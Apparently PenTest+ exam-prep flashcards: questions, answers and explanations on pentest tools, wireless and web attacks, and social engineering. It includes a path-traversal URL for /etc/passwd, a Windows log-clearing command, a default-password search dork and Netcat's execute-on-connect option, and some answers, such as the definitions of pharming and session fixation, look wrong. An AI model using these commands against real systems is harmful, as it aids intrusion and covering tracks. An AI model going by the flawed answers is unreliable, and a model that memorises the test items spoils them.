CertPentest+
Netcat parameters
#The -l parameter starts Netcat in listen mode. The default mode is to act as a client. #The -L parameter starts Netcat in the Windows-only "listen harder" mode. This mode creates a persistent listener that starts listening again when the client disconnects. #The -e parameter specifies the program to execute when a connection is made.
A security tester is looking for custom scripts against uncommon services which they can't find in MetaSploit. Which of the following could they look at to possibly find what they need? a) ExploitDB b) MSTG c) OWASP d) OSSTMM
a) ExploitDB #While there are many repositories available, the team can use the Exploit Database (Exploit DB) which provides a complete collection of public exploits and vulnerable software in a searchable database. #The MSTG (Mobile Security Testing Guide) provides an intuitive framework that steps you through the assessment process and includes a dashboard, security recommendations, and specifications for testing resiliency.
A threat actor designed a malicious cross-site scripting attack to execute on the client's browser. What type of attack does this represent? a) Persistent attack b) Reflected attack c) DOM-based attack d) Directory traversal
c) DOM-based attack
A client for a security assessment is worried about corruption of company information, as there are indications that data has been changed in some way, and wants to perform a health check. What is this called? a) Data exposure b) Risk gap c) Attack surface d) Data modification
d) Data modification #Data modification or corruption is when data has been altered in some way, which is a violation of integrity. #Exposing sensitive data occurs when someone or something exposes sensitive or personal data, which is a violation of confidentiality. #Until a patch is applied, the system is vulnerable and creates a risk gap, which is the time between when the vendor releases a patch, and the patch is applied. #Vulnerabilities exist in many different areas, called attack surfaces, which include software, hardware, networks, and users that can be exploited.
A threat actor has obtained a user's session ID (SID) and is impersonating the user. What type of session attack is this? a) Cross-site request forgery b) Server-side request forgery c) Session replay d) Session fixation
d) Session fixation #This represents a session fixation attack which requires the user to authenticate with a known session identifier that the threat actor will then use for impersonation. #Session replay requires having access to the user authentication process itself so that the threat actor can intercept it and repeat it.
Most common API's
1) RESTful: API based on REST (Representational state transfer) 2) XML-RPC: Extensible Markup Language-Remote Procedure Call 3) SOAP: Simple Object Access Protocol
Censys vs. Shodan
Censys conducting more horizontal scans (each scanner potentially scanning the entire IPv4 space), whereas for Shodan the IPv4 space appears divided among its scanners.
A security researcher is testing the disruption of a Wi-Fi signal by broadcasting on the same frequency as the target WAP. What is this called? a) Jamming b) Pineapple c) Deauthentication d) Slowloris
a) Jamming #Jamming is an attack that disrupts a Wi-Fi signal by broadcasting on the same frequency as the target WAP, and any signals that a wireless transceiver is attempting to send or receive will be blocked.
A security penetration tester wants to try exfiltrating data by synthesizing images into .wav files. Which tool should they use to do this? a) OpenStego b) Snow c) Coagula d) Ostinato
c) Coagula #Coagula is a tool used to synthesize an image into a .wav file. To achieve this, you'll need to download Coagula and Audacity, which are both free programs.
A penetration tester discovers a device during an engagement and needs to try conducting a Pixie attack or attempt to crack PMKID offline. Which tool should they use? a) Airmon-ng b) Spooftooph c) ScoutSuite d) Wifite2
d) Wifite2 #Wifite2 is a wireless auditing tool you can use to assess the WLAN. Wifite2 can launch a variety of attacks including Pixie attacks, PMKID cracking, and more. #ScoutSuite is an open-source tool written in Python that can be used to audit instances and policies created on multi-cloud platforms, such as AWS, Microsoft Azure, and Google Cloud.
SAN SET WiGLE Dirbuster
#A more useful field in a digital certificate from a reconnaissance perspective is the subject alternative name (SAN). SANs can identify specific subdomains that can be covered by the certificate. #The Social Engineering Toolkit (SET) is a Python-based collection of tools that can be used when conducting a social engineering PenTest. You can download SET and install it on a Linux, Unix, and Windows machine or use it within Kali Linux. #WiGLE is a site dedicated to mapping and indexing access points. When WiGLE first became available in 2001, many wardrivers used the site to locate open access points to use the "Free Internet." #Dirbuster is specifically geared towards website enumeration. There are numerous tools and techniques available to evaluate a website.
Gobuster vs. DirBuster
#Gobuster can discover subdomains, directories, and files by brute-forcing from a list of common names. This can provide information that was otherwise not available. #DirBuster is a web application brute-force finder for directories and files that comes with nine different lists, including default directories and common names given by developers. Dirbuster is specifically geared towards website enumeration. There are numerous tools and techniques available to evaluate a website. NOTE: DirBuster is a web application but Gobuster is not.
Virtual environment attack types
#This represents a class 1 virtual environment attack in which the attack happens outside of the virtual machine and can affect the entire virtual environment. #A class 2 virtual environment attack directly affects the source, but not necessarily originating from the source. #A class 3 virtual environment attack is when the attack originates within the virtual machine and the virtual machine is the attack source.
Difference between DNS/MAC/ARP spoofing:
1) Domain Name System (DNS) cache poisoning sends bogus records to a DNS resolver. When the victim requests an IP address, the DNS server will send the wrong IP address. 2) Address Resolution Protocol (ARP) spoofing transmits spoofed ARP messages out on the LAN. The spoofed messages falsely report a malicious actor's MAC address as being the victim's address. 3) MAC address spoofing will modify the MAC address on the malicious actor's NIC card so that it matches the MAC address on the victim's machine.
Three categories of XSS attacks
1) Persistent - injected code is permanently stored on the web server. For e.g: injection of malicious code or links into a website's forums, databases, or other data. 2) Reflected - code reflects from victim to server then back to attacker. For e.g: In a reflected attack, a threat actor crafts a form or other request that the system will send to a legitimate web server. This request includes the malicious script. 3) DOM-based - takes advantage of a web app's client-side implementation of JavaScript to execute the attack solely on the client. For e.g: In a Document Object Model (DOM)-based attack, the threat actor does not send malicious scripts to the server, instead, they take advantage of a web app's client-side implementation of JavaScript to execute the attack solely on the client.
Session Replay Attack vs. Session Fixation Attack.
Both fixation and hijacking have ultimately the same goal - gaining access to a session. They only differ in how you achieve that. #Session hijacking is simply the act of stealing an existing, valid session cookie. Most commonly through sniffing network traffic (a MITM attack), but also through any other ways that a session ID may be leaked. #Session fixation is similar, but inverted - a pre-defined session cookie is planted into the victim's browser. So after the victim logs into a website, they will use the same session cookie that the attacker already knows, and thus the attacker-owned cookie is now authenticated and can be exploited. Of course that requires an attacker to have temporary access to the victim's browser itself, but the principle is very simple - there's no need to steal the data if it is under your control in the first place.
Why Powershell?
PowerShell can make it easier for PenTesters to automate the process of exploiting the Registry, Active Directory (AD) objects, Group Policy , the Windows network stack, and more. NOTE: Powershell is not general-purpose interpreted programming language (IPL)
Wifite2
Wifite2 is the wireless tool that can survey WLAN frequencies and automate a wireless attack through a series of command-line selections.
A penetration tester is using Netcat and does not want the command to perform DNS lookups for host names on the other end of the connection. What option will accomplish this? a) -n b) -p c) -z d) -l
a) -n #The penetration tester can use the -n option to tell Netcat not to perform DNS lookups for host names on the other end of the connection. #Penetration testers can use the -p option to specify the port that Netcat should start listening on in listen mode. In client mode, it specifies the source port. #Penetration testers can use the -z option to start Netcat in zero I/O mode, which instructs it to send a packet without a payload. #Penetration testers can use the -l option to start Netcat in listen mode. The default mode is to act as a client.
A PenTester developed a collapsed script and is now ready to inject it so it will download and execute a payload. What are some ways the PenTester can inject the script? (Select all that apply.) a) As a macro in Word document b) Via a USB implant c) Via a cookie d) Via a phishing email
a) As a macro in Word document b) Via a USB implant d) Via a phishing email #The PenTester can execute the collapsed script, which is also known as a one-liner, as a macro in a Word document that will execute when a user opens the document. #The PenTester can execute the collapsed script, which is also known as a one-liner, via a USB implant if the tester has physical access to the system. #The PenTester can execute the collapsed, or simplified, script via a phishing email which tricks the user into opening a document or clicking a link that executes it. NOTE: The PenTester cannot execute the collapsed script via a cookie as a cookie is a text file containing the session ID for a particular web session that a server gives to a client browser.
An administrator configured the system to lock out accounts for 30 minutes after 3 unsuccessful login attempts, but the system did not lock out accounts after three unsuccessful attempts and a threat actor took advantage of this failure to compromise a user's password. What does this represent? a) Business logic flaw b) Horizontal privilege escalation c) Vertical privilege escalation d) Session hijacking
a) Business logic flaw #This represents a business logic flaw which is a vulnerability that arises from implementation and design issues that lead to unintended behavior. Most common of services that are exploited due to business logic flaws is API. #Horizontal privilege escalation is obtaining access to a regular user account with different access or permissions than the one currently in use. NOTE: This approach has great potential for information gathering without raising possible suspicion, as irregular user activity is more likely to stay unnoticed than irregular admin activity. #Vertical privilege escalation is to obtain access to an account of higher privilege than the one we currently have, to enable resources that the regular user does not have permission for. NOTE: vertical PrivEsc is used when we need to upgrade "restrictive shell". The restricted shell is a Unix shell that restricts some of the capabilities available to an interactive user session, or to a shell script, running within it. It is intended to provide an additional layer of security, but is insufficient to allow execution of entirely untrusted software.
A penetration tester is using a framework to help manage available exploits and keep control of the devices the tester has targeted. What kind of framework is the tester using to accomplish this? a) C2 b) BeEF c) SQLi d) LDAP
a) C2 #The command and control (C2) frameworks manage available exploits, as well as help penetration testers keep control of the devices the tester has targeted. #SQLi is a SQL injection attack that allows the modification of any of the four basic functions of SQL querying by embedding code within the web application, causing it to execute your own set of queries using SQL. #The Lightweight Directory Access Protocol (LDAP) is a standard for networked devices on how to manage directory services.
A security tester has been using Shodan for several engagements but wants another source of reference similar to Shodan. Which of the following would best fit that? a) Censys b) OpenVAS c) Netcat d) ObfuscatedEmpire
a) Censys #When testing for vulnerabilities, one tool the team can use is Censys, an attack surface analyzer, similar to Shodan, to identify exposed systems. #A team can run a vulnerability scan using the Open Vulnerability Assessment Scanner. OpenVAS will list the vulnerabilities along with a risk rating that summarizes the overall state of the site that was tested.
A threat actor passed input to a web server which the system shell then executed. What type of attack did the threat actor execute? a) Command injection b) Code injection c) Data exfiltration d) IoT data corruption
a) Command injection #The threat actor executed a command injection attack in which the threat actor supplied malicious input to the web server, which then passed this input to a system shell for execution. #Code injection is an attack that introduces malicious code into a vulnerable application to compromise the security of that application. #Data exfiltration involves threat actors covering tracks by deleting entries from an access device or retrieving sensitive information through less conspicuous channels to avoid detection. #IoT data corruption refers to faults in the information transmitted, stored, or otherwise managed by IoT devices.
A security tester wants to launch an attack on a WPA2-Enterprise 802.11a or 802.11n network in a free, easy-to-use platform. Which of the following should they use? a) EAPHammer b) Fern c) Spooftooph d) SOHO
a) EAPHammer #EAPHammer is another Python-based toolkit with a wide range of features. It provides options that the team can use to launch an attack on a WPA2-Enterprise 802.11a or 802.11n network in an easy-to-use platform. Fern runs on a Linux OS and can recover WEP/ WPS/WPA/ keys using a variety of methods. Fern is a commercial product; there is a free version as well that offers limited functionality.
A penetration tester is using a tool that is brute-forcing a list of common names to find subdomains, directories, and files. What tool is the penetration tester using? a) Gobuster b) OWASP ZAP c) DirBuster d) w3af
a) Gobuster #Gobuster can discover subdomains, directories, and files by brute-forcing from a list of common names. This can provide information that was otherwise not available. NOTE: theHarvestor and recon-ng can discover subdomains, employee names, email addresses, PGP key entries, open ports and service banners. #OWASP ZAP (Zed Attack Proxy) is a proxy that allows for both automated and manual testing and identification of vulnerabilities. #DirBuster is a web application brute-force finder for directories and files that comes with nine different lists, including default directories and common names given by developers. #w3af (Web Application Attack and Audit Framework) allows users to identify and exploit a large set of web-based vulnerabilities, such as SQL injection and cross-site scripting.
A malicious actor compromised a virtual machine host which allowed the malicious actor to gain control of the virtual environment. What type of attack does this represent? (Select all that apply.) a) Hyperjacking b) Class 1 c) VM escape d) Class 3
a) Hyperjacking b) Class 1 #This represents hyperjacking which is when a malicious actor takes control of the hypervisor that manages a virtual environment and then has all the required privileges to take full control of the environment. #VM escape is an attack where malware running in a VM is able to interact directly with the hypervisor or host kernel.
Security risks to web applications are common. Which does the OWASP deem as the most critical? (Select all that apply.) a) Insecure Data Transmission b) Lack of Error Handling c) User Input Sanitization d) Lack of Code Signing
a) Insecure Data Transmission b) Lack of Error Handling #Insecure data transmission is on the OWASP Top 10 as A6:2017-Security Misconfiguration where data transmission must be secure, but implementations in security measurements may leave gaps. #Lack of error handling is on the OWASP Top 10 in A3:2017-Sensitive Data Exposure as an application may not respond gracefully to unexpected input which can lead to crashing the application. #User input sanitation is not on the OWASP Top 10, but a lack of user input sanitation is and can lead to injection attacks, which is what OWASP Top 10: A1:2017-Injection addresses. #Lack of code signing is not on the OWASP Top 10, but code signing is and determines that a threat actor has not tampered with a script or executable.
A PenTester is developing a cross-site scripting (XSS) attack. What scripting language will the PenTester most likely use? a) JavaScript b) Ruby c) Python d) PowerShell
a) JavaScript #The PenTester will most likely use JavaScript which developers use alongside HTML and CSS on the World Wide Web and PenTesters use it heavily in XSS attacks and PenTesting. #Ruby, like Python, is a general-purpose interpreted programming language that PenTesters can also use as a scripting language, but JavaScript is most popular. #Python is a popular language for implementing all kinds of development projects, including automation tools and security tools, as well as malicious scripts. #PowerShell can make it easier for PenTesters to automate the process of exploiting the Registry, Active Directory objects, Group Policy, the Windows network stack, and more.
A student is studying cyber security and reads about a tool called Responder. The student sets it up on their home network to test on devices that they own. Which protocols should they filter during packet captures to see what is happening? (Select all that apply.) a) LLMNR b) NBT-NS c) SSH d) VNC
a) LLMNR b) NBT-NS #Responder is a man-in-the-middle type tool that can be used to exploit name resolution on a Windows network which poisons LLMNR (Link local Multicast Name Resolution). Remember to disable it using registry editor by going to the HKLM/Software/Policies/Microsoft/Windows NT/DNSclient and setting the data value to 0. #Responder is also designed to intercept and poison NBT-NS. Once a request is intercepted, Responder will return the attacker's host IP as the name record.
A company is using enterprise mobility management software (EMM) to make sure that all the devices employees bring and connect to the corporate network meet established security policies. What functions will the EMM software manage? (Select all that apply.) a) Locking and wiping employee devices b) Preventing employees from installing apps c) Reporting personal data usage back to the employer d) Pushing out updates to devices
a) Locking and wiping employee devices b) Preventing employees from installing apps d) Pushing out updates to devices #The EMM software will allow locking and wiping of employee devices through mobile device management (MDM) which sets device policies for authentication, feature use, and connectivity. #The EMM software will prevent employees from installing apps through mobile application management (MAM) which sets policies for apps and can prevent the installation of unauthorized apps. @The EMM software will push out updates to devices through mobile application management (MAM) which sets policies for apps that can automatically push out updates. NOTE: The enterprise mobility management software (EMM) software typically does not report employee personal data usage back to the employer. They may report back data usage within the enterprise side.
A vulnerability has just gone through the mitigation phase of the vulnerability lifecycle. What is the next phase? a) Manage b) Document c) Discover d) Coordinate
a) Manage #Manage is when the patch has been released. It's now up to each organization to take the next step and apply the patch in order to remediate or mitigate the vulnerability. #Document is the final phase, in that the vulnerability has been tested, and everyone involved will take a moment to document what has been done. In addition, it's best to reflect on lessons learned. #Discover is the first phase of finding a potential vulnerability that can be exploited. It's important to recognize that a vulnerability exists in order to defend against a possible attack, now or in the future. #Coordinate is the next phase, where both the vulnerability and the potential to exploit the vulnerability are known. Discover Coordinate Manage Document
A team is conducting a physical assessment and uses a simple mechanism such as Styrofoam to bypass a certain control. Which control are they likely bypassing? a) Motion sensor b) Fences c) Security badges d) Locks
a) Motion sensor #The team can attempt to block the motion detector by using a piece of cardboard or Styrofoam over the sensor. #Many buildings have perimeter security, such as natural barriers or fences, to deter someone from simply entering the property. Cardboard would not be as helpful with this. #A radio-frequency identification (RFID) badge system can be used for physical security. These badges hold an individual's authorization credentials and use a proximity reader that reads data when in range. #Lock picking uses specialized tools to manipulate the components of a lock in order to gain access to a restricted area.
A penetration tester is analyzing entry to a network utilizing 802.1X authentication. Which of the following is NOT one of the three main components of this setup? a) Organizational Units b) Supplicant c) Authenticator d) AS
a) Organizational Units #Organizational Units are used with a domain to group similar objects such as the users, groups, computers, and other OUs and minimize the number of domains. #The Supplicant (or Wi-Fi client) is the first entity in 802.1X authentication. In a corporate WLAN, clients generally must authenticate prior to gaining access to the network using the 802.1X authentication protocol. #The Authenticator (or WAP) is the second entity in 802.1X authentication. Once authenticated, a virtual port is created on the access point and the client can then access network resources. #The Authentication Server (AS) is the last entity in 802.1X authentication. It is generally a RADIUS server that provides the authentication.
A script is any computer program that automates the execution of tasks for a particular runtime environment. Which of the following represent elements of a well-written script? (Select all that apply.) a) Parameters b) Branching and looping c) Unexpected checks d) Unit tests
a) Parameters b) Branching and looping d) Unit tests #An element of a well-written script is parameters that the script takes as input data and the system passes to the script as arguments. #An element of a well-written script is branching and looping statements that can alter the flow of execution based on conditions. #An element of a well-written script is unit tests to ensure that the script returns the expected outputs, given the expected inputs. NOTE: Unexpected checks is not an element of a well-written script but scripts should have validation and error handlers to check inputs and ensure robust execution.
A security professional is looking for an organization's code that might have been posted publicly by developers. Which of the following sources is least likely to contain accidental posts by a company's developers? a) Reddit b) Github c) Bitbucket d) CloudForge
a) Reddit #Reddit is less likely to contain code from developers, though it is possible it could exist on here. The other three options are specifically geared towards shared code repositories. #Github enables teams to work together, regardless of their location, is free to basic users, and has reasonable costs for teams and enterprise users. #Bitbucket allows inline comments, a secured workflow, and free to small teams, fee-based for larger groups. #CloudForge offers bug and issue tracking, discussion forums, and document management. You can get a free trial for 30 days, after which there is a nominal fee.
A security professional is looking for interesting targets on a public-facing web server. When reviewing server files by the professional, what areas should not be crawled/searched? a) Robots b) Subject alternative name c) Revocation list d) Secret
a) Robots #The robots.txt file is a simple yet essential file that tells the bots where to search, and more importantly, where NOT to search. One of the more useful fields in a digital certificate from a reconnaissance perspective is the subject alternative name (SAN). The Certification Revocation List (CRL) is a list of certificates that in some way have been deemed invalid. Although the CRL is effective, most online services have moved to the newer OCSP to check the validity of the certificate. Secret.txt is not a common file but the Steganography example uses secret.txt as an example.
A penetration tester has established a foothold inside a network and wants to conduct reconnaissance inside while remaining anonymous. What could they use to best accomplish this? a) SOCKS b) masscan c) Ostinato d) Snow
a) SOCKS #Proxy servers are used on a network to mediate the communications between a client and another server. One method is to use Socket Secure (SOCKS). #masscan is not a tool meant for inside networks. It is extremely noisy and was designed for scanning the internet rapidly. This could actually take down a network if not careful. #Ostinato uses packet crafting techniques as part of the attack. A more popular packet crafting tool is Scapy or hping3 which allows users to craft their own packets.
A military unit has adopted sending communications hidden in the white space of text files as a standard operating procedure. Which of the following tools uses white space to conceal data payloads? a) Snow b) Steghide c) OpenStego d) Yersinia
a) Snow #White space is the hint. #Snow is a CLI steganography tool that conceals a data payload within the whitespace of a text file that uses the ASCII format. #OpenStego is similar to most other tools in that you embed a message in a carrier file. To get started, youll need to make sure that you have the Java Runtime Environment (JRE) installed. #Yersinia uses packet crafting techniques as part of the attack. A more popular packet crafting tool is Scapy pr hping3 which allows users to craft their own packets.
A security consultant needs to gain information about executives during a penetration test. One method they want to attempt is by cloning Bluetooth devices of the executive personnel. Which of the following tools could they use to perform this? a) Spooftooph b) Airodump-ng c) Wifite2 d) Prowler
a) Spooftooph #One tool that can either spoof or clone a Bluetooth device is Spooftooph. Keep in mind, before making any changes to a Bluetooth adapter, you must run Spooftooph with root privileges.
An employee just started a new job and learns that the company uses a COBO policy for mobile devices. What does this mean? a) The company will issue the employee a mobile device that the employee can only use for company business. b) The company will allow the employee to bring their own device. c) The company will issue the employee a device that the employee can use for both company and personal business. d) The company will issue the employee a device that the employee can select from a curated list of devices.
a) The company will issue the employee a mobile device that the employee can only use for company business. #Corporate-owned, business only (COBO) means that the company will issue the employee a mobile device that the employee can only use for company business. #The company will allow the employee to bring their own device in the bring your own device (BYOD) deployment model. #The company will issue the employee a device that the employee can use for both company and personal business in the corporate-owned, personally enabled (COPE) deployment model. #The company will issue the employee a device that the employee can select from a curated list of devices in the choose your own device (CYOD) deployment model.
A security consultant is attempting to look for default passwords for a client's D-Link phones. Which of the following should they use? a) intitle:"DPH" "web login setting" b) inurl:"ccmuser/logon.asp" c) intitle:"Grandstream Device Configuration" password d) inurl:"CallManager"
a) intitle:"DPH" "web login setting" #intitle:"DPH" "web login setting" would be used to find information of D -Link Phones. If they don't have the password, they can search online for the default password to try on the targeted system. #inurl:"ccmuser/logon.asp" would be used to find Cisco CallManager instances. They can also try some other Google Hacking to find more information on VoIP phones that you can use to launch the attack. #intitle:"Grandstream Device Configuration" password would be used to find information about Grandstream phones. #inurl:"CallManager" would not be a valid instance of attempting to find CallManager instances, they would have to search for ccmuser.
A security professional is performing an assessment against web servers and is currently in the reconnaissance phase. They are performing initial service enumeration by attempting to open a session with service and getting the service to identify itself. Which of the following tools are suited for this? (Select all that apply.) a) netcat b) SET c) wget d) Shodan
a) netcat c) wget #Netcat (nc) is a popular tool for Unix and Linux. The following shows using an HTTP GET request to elicit the webserver type and version: echo -en "GET / HTTP/1.0\n\n\n"|nc www.comptia.org 80|grep Server. #Wget can be used to grab a banner using the following syntax: wget -S. When using this command, -S will print the HTTP headers that are sent by the server.
A security tester wants to disable monitor mode on a wireless interface. Which tool should they use? a) Aireplay-ng b) Airmon-ng c) Airodump-ng d) Pacu
b) Airmon-ng #Airmon-ng will enable and disable monitor mode on a wireless interface. Airmon-ng can also switch an interface from managed mode to monitor mode. #Aireplay-ng injects frames to perform an attack to obtain the authentication credentials for an access point, which is usually performed using a deauthentication attack. #Airodump-ng provides the ability to capture 802.11 frames and then use the output to identify the Basic Service Set ID (MAC address) of the access point along with the MAC address of a victim client device. #Pacu is designed as an exploitation framework to assess the security configuration of an AWS account. It includes several modules to attempt exploits such as obtaining API keys or gaining control of a VM instance.
A security professional is testing the Wi-Fi with MDK4 and wants to create the appearance of many wireless networks. Which of the following modes should they use? a) A b) B c) D d) W
b) B #Mode b creates the appearance of many wireless networks. MDK4 is a powerful Linux based tool that features a wide range of attacks. #In mode A authentication, DoS will send multiple authentication frames to WAP in range with the intent of overwhelming the AP. #Mode D will send a deauth to disconnect and disassociate all clients from an AP. MDK4 supports 2.4 to 5GHz and has nine attack modules. #Mode W will provoke an Intrusion Detection and Prevention Systems confusion attack. When testing with this tool use caution, as some of the attack modules can have a serious negative effect on the network.
A security professional wants to use SET for a targeted attack towards personnel. Which of the following can SET NOT do? a) Spear phishing b) Badge cloning c) Website attacks d) Wireless attacks
b) Badge cloning #Badge cloning is not currently a capability of The Social Engineering Toolkit (SET), but it does allow for third-party modules. #Spear phishing is the first option under social engineering attacks. You can download SET and install it on a Linux, Unix, and Windows machine or use it within Kali Linux. #Website attack vectors are the second option under social engineering attacks. SET allows you to select from a number of different options that include attacking websites, mass mailings, and spear phishing attacks. #Wireless attacks are the seventh option under social engineering attacks.
According to the OWASP Top 10, which of the following are among the most relevant critical security risks to web applications? (Select all that apply.) a) Secure deserialization b) Broken authentication c) Sufficient logging and monitoring d) Cross-site scripting
b) Broken authentication d) Cross-site scripting #Broken authentication is in the OWASP Top 10 as one the most relevant critical security risks to web applications and OWASP covers it in A2:2017-Broken Authentication. #Cross-site scripting (XSS) is in the OWASP Top 10 as one the most relevant critical security risks to web applications and OWASP covers it in A7:2017-Cross-Site Scripting (XSS). #Secure deserialization is not in the OWASP Top 10, but OWASP does cover insecure deserialization in A8:2017-Insecure Deserialization. #Sufficient logging and monitoring is not in the OWASP Top 10, but OWASP does cover insufficient logging and monitoring in A10:2017-Insufficient Logging & Monitoring.
A penetration tester likes the functionality of Armitage and wants to get a fuller paid version for use on client tests. What should they look into? a) MetaSploit Pro b) Cobalt Strike c) Responder d) Ostinato
b) Cobalt Strike #Cobalt Strike is a commercial version of Armitage with advanced features and reporting. Armitage itself is an intuitive GUI for the Metasploit framework. #Metasploit Pro is a full-featured graphical version that includes Quick Start wizards, easy vulnerability scanning and validation, phishing campaigns, and reporting.
A PenTester is reverse engineering code by translating low-level machine code into higher level assembly language code so that the PenTester can read it and understand how the application is functioning. What type of reverse engineering process is this? a) Decompilation b) Disassembly c) Debugging d) Static code analysis
b) Disassembly #This is disassembly which is the reverse engineering process of translating low-level machine code into higher level assembly language code that is human readable and can include familiar programming elements. #Decompilation is the reverse engineering process of translating an executable into high-level source code to help determine whether the application's logic will produce unintended results. #Debugging is the process of manipulating a program's running state in order to analyze it for general bugs, vulnerabilities, and other issues. #Static code analysis is the process of reviewing uncompiled source code either manually or using automated tools to correct errors.
During a penetration testing engagement, one of the team members presents a fictitious situation as real. What is this tactic called? a) Elicitation b) Hoax c) Pretexting d) Phishing
b) Hoax #A hoax is another element of social engineering in which the attacker presents a fictitious situation as real. A hoax could be a link that leads to malicious code. #Elicitation is acquiring data from the target in order to launch an attack. This is different from information gathered about the target. #One social engineering tactic is to use pretexting, whereby the team will communicate, whether directly or indirectly, a lie or half-truth in order to get someone to believe a falsehood. #Phishing is a social engineering attack where the malicious actor communicates with the victim from a supposedly reputable source.
A digital forensics expert works for a large corporation and doesn't have enough time to manually analyze all the employee-returned mobile devices before administrators issue them to new employees. What tool can the forensics expert use to automate the evaluation of code and malware analysis on mobile devices? a) MSTG b) MobSF c) OWASP d) Kali
b) MobSF #The Mobile Security Framework (MobSF) can provide an automated evaluation of code and malware analysis using both static analysis and dynamic analysis. #The MSTG (Mobile Security Testing Guide) provides an intuitive framework that steps you through the assessment process and includes a dashboard, security recommendations, and specifications for testing resiliency.
An organization is using a testing framework to provide oversight and minimize risk with mobile devices. Which of the following are common elements of the testing framework when used on mobile devices? (Select all that apply.) a) COBO Approval b) Mobile Device Assessment c) Secure App Development d) Mobile App Testing
b) Mobile Device Assessment c) Secure App Development d) Mobile App Testing #A common element of the testing framework is mobile device assessment which provides an overview of compliance and business logic issues. #A common element of the testing framework is secure app development which creates organization-specific apps that are in line with organizational policy. #A common element of the testing framework is mobile app testing which includes Static Application Security Testing (SAST) and Dynamic Application Security Testing (DAST).
A penetration tester wants to test exfiltrating data via encrypted mechanisms. What could they use to accomplish this? a) Netcat b) Ncat c) Coagula d) Yersinia
b) Ncat #Ncat is an Interactive CLI tool written for the Nmap Project. Ncat is used to read and write raw data over a network and includes support for proxy connections along with IPv6 and SSL communications. NOTE: it is built into nmap and can be installed in Windows, Linux and macOS. #Netcat is a command-line utility used to read from or write to a TCP or UDP network connection.
A security professional is trying to evaluate a website for web-specific vulnerabilities. Which of the following is the tool most suited towards this objective? a) OpenVAS b) Nikto c) SQLmap d) Censys
b) Nikto #Nikto is an open-source web server scanner that can complete comprehensive testing on web servers for a variety of vulnerabilities, such as anti-clickjacking X-Frame-options header, and dangerous files and CGIs.
An attacker has sent an email where the victim navigates to a malicious web page that has been set up to look official. What is this called? a) Phishing b) Pharming c) Baiting d) Malvertising
b) Pharming #Pharming is when an attacker entices the victim into navigating to a malicious web page that has been set up to look official. #While this would fall under the phishing category, it more specifically falls under pharming. Phishing is a social engineering attack where the malicious actor communicates with the victim from a supposedly reputable source. #Baiting is where an attacker will leave bait, such as an infected physical media, in an area where a victim can find the device. #Spam can include malvertising, which is an email that looks like a normal ad, but instead includes malicious code.
An attacker is attempting to access a WPS device at a site in order to gain entry to a larger corporate network. Which of the following could they do? (Select all that apply.) a) HTTP flood b) Physical c) Side channel d) Brute force
b) Physical d) Brute force #At a site means the attacker is close to the device. #A physical attack takes advantage of the "push to connect" feature found on many routers. When launching this attack, the malicious actor will need to be physically close to the device. #In addition to a physical attack, a malicious actor can gain access to the network by determining the PIN number of the WPS device, using an online or offline brute force attack. #In a side-channel attack, this exploit is possible because of the shared nature of the cloud infrastructure, especially in a PaaS model.
A team of software engineers need to build a set of APIs (application programming interfaces) between a customer relationship management system and a new web-based application that allows customer service representatives to create work orders and automatically populate the customer information. What is the best tool for the engineers to use to build and test the APIs? a) MSTG b) Postman c) APK Studio d) APKX
b) Postman #Postman is a tool that provides an interactive and automatic environment that allows teams to build, interact, analyze and report on, and test HTTP APIs. #The MSTG (Mobile Security Testing Guide) provides an intuitive framework that steps you through the assessment process and includes a dashboard, security recommendations, and specifications for testing resiliency. #APK Studio is an integrated development environment (IDE) designed so you can decompile and or edit an APK file. #APKX tool is an Android APK file decompiler that allows you to pull and analyze the Java source code to see what's going on inside.
A penetration tester wants to try keeping multiple fake web connections open for as long as possible, until the maximum number of allowed connections is reached. They want to employ this method on a test server to see how much they will be able to handle before needing to scale outwards. What type of attack should they use to test this? a) HTTP flood b) Slowloris c) DNS amplification d) Prowler
b) Slowloris #A slowloris attack keeps multiple fake web connections open for as long as possible until the maximum number of allowed connections is reached. #An HTTP flood uses seemingly legitimate HTTP GET or POST requests to attack a web server. It does not require spoofing or malformed packets but can consume a high number of resources with a single request. #Prowler is an audit tool for use with Amazon Web Services only. It can be used to evaluate cloud infrastructure against the Center for Internet Security (CIS) benchmarks.
A PenTester is preparing to target a database but cannot find any code on the Internet to exploit it. What are some reasons why this would happen? (Select all that apply.) a) The Internet does not host exploit code. b) The administrator patched the database. c) It is not a common database type. d) It is a proprietary database.
b) The administrator patched the database. c) It is not a common database type. d) It is a proprietary database. #The penetration tester may find exploitation code difficult to locate because the administrator recently patched the database, and it is no longer vulnerable to known exploits. #The penetration tester may find exploitation code difficult to locate because it is not a common database type, therefore, there are no publicly available exploits for it. #The tester may find exploitation code difficult to locate because it is a proprietary database that the organization developed in-house so there are no exploit scripts freely available on the Internet for it. NOTE: Exploitation codes exist and are publicly available on the Internet or via other sources so it is highly likely a PenTester will be able to find exploit codes to use during a penetration test.
A security researcher has detected anomalous timestamp entries where a system's log event microseconds have all been set to 0, and they suspect the system has been compromised and the timestamps modified. Which tool did the attacker probably use? a) Meterpreter b) TimeStomp c) Shred d) Wevtutil
b) TimeStomp #Changing time values is possible by using Metasploit's meterpreter tool called TimeStomp which allows you to delete or modify timestamp-related information on files. #TimeStomp is a tool inside of meterpreter which allows you to delete or modify timestamp-related information on files. #Shred is a command built into Linux to make sure that files are securely deleted and completely removed. Windows doesn't have a built-in command-line equivalent to file-based shredding. #When using the command-line interface (CLI) in Windows, you can also clear individual log categories. For example, wevtutil cl Application will clear the application log.
A PenTester is using Python to write a script in preparation for a PenTest. What can the PenTester do to complete the script quickly as well as take advantage of work that others have already completed? (Select all that apply.) a) Write each line of code from scratch b) Use classes c) Use modules d) Use pre-built libraries
b) Use classes c) Use modules d) Use pre-built libraries #The PenTester can use classes which are user-defined prototypes or templates from which PenTesters can create objects and they allow the PenTester to bundle data and functionality together. #The PenTester can use modules which are a way for the PenTester to code re-usable functions, variables, and classes that the tester can import into scripts. #The PenTester can use pre-built libraries. Importing and using existing modules in libraries can save the PenTester a lot of time because the tester is re-using modules that others have already created.
A security consultant is attempting to see users and potential passwords by using the following URL: http://comptia.com/resources/../../../../etc/passwd but receives a dropped packet. What is most likely preventing this? a) Router b) WAF c) Load balancer d) ACL
b) WAF #A web application firewall (WAF) is specifically designed to monitor web applications and guard against common attacks such as cross-site scripting (XSS) and SQL Injection (SQLi) attacks. #Routers act as control points for communications between network segments. A router is NOT preventing this activity. #A load balancer is used to stabilize network traffic across two or more servers. Balancing the load prevents any one server from getting too many requests. #An access control list (ACL) is essentially a list that tells devices the corresponding access rights that users have to various objects, such as file directories, or permissions to access network resources.
